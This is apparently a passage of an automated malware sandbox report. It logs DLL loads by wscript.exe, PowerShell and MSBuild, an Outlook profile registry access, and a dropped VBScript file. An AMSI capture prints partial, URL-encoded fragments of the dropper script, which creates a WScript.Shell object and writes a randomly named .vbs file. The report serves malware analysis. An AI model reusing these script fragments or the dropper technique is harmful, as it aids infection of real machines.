              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22)%0Awind");ITextStream.WriteLine(" entry:72 f:replaceString a0:%22Option%20Explicit%0A'Project%20Name%3A%20%7Cpath%7C%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0");ITextStream.WriteLine(" exec:529 f:replaceString");ITextStream.WriteLine(" entry:537 o:%22Option%20Explicit%0A'Project%20Name%3A%20%7Cpath%7C%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0AwindowsDir%20%3");ITextStream.WriteLine(" exit:537 o:%22Option%20Explicit%0A'Project%20Name%3A%20%7Cpath%7C%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0AwindowsDir%20%3D");ITextStream.WriteLine(" entry:535 o:Option%20Explicit%0A'Project%20Name%3A%20%2C%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0AwindowsDir%20%3D%20objShe");ITextStream.WriteLine(" exit:535 o:Option%20Explicit%0A'Project%20Name%3A%20%2C%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0AwindowsDir%20%3D%20objShel");ITextStream.WriteLine(" exit:72 f:replaceString r:%22Option%20Explicit%0A'Project%20Name%3A%20YLhjFraZZwiadZg%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22");ITextStream.WriteLine(" entry:68 f:createTextFile a0:%22C%3A%5CUsers%5Cuser%5CYLhjFraZZwiadZg.vbs%22 a1:%22Option%20Explicit%0A'Project%20Name%3A%20YLhjFraZZwiadZg%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0A");ITextStream.WriteLine(" exec:482 f:createTextFile");IFileSystem3._00000000();ITextStream.WriteLine(" entry:495 o: f:FileExists a0:%22C%3A%5CUsers%5Cuser%5CYLhjFraZZwiadZg.vbs%22");IFileSystem3.FileExists("C:\Users\user\YLhjFraZZwiadZg.vbs");IFileSystem3._00000000();ITextStream.WriteLine(" exit:495 o: f:FileExists r:false");IFileSystem3._00000000();ITextStream.WriteLine(" entry:510 o: f:CreateTextFile a0:%22C%3A%5CUsers%5Cuser%5CYLhjFraZZwiadZg.vbs%22 a1:true");IFileSystem3.CreateTextFile("C:\Users\user\YLhjFraZZwiadZg.vbs", "true");IFileSystem3._00000000();ITextStream._00000000();ITextStream.WriteLine(" exit:510 o: f:CreateTextFile r:");ITextStream._00000000();ITextStream.WriteLine(" entry:518 o: f:Write a0:%22Option%20Explicit%0A'Project%20Name%3A%20YLhjFraZZwiadZg%0A'%20D%C3%A9claration%20des%20variables%0ADim%20objShell%2C%20windowsDir%2C%20i%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%");ITextStream.Write("Option Explicit'Project Name: YLhjFraZZwiadZg' Dclaration des variablesDim objShell, windowsDir, iSet objShell = CreateObject("WScript.Shell")windowsDir = objShell.ExpandEnvironmentStrings("%windir%")' Fonction pour vrif

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\YLhjFraZZwiadZg.vbsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
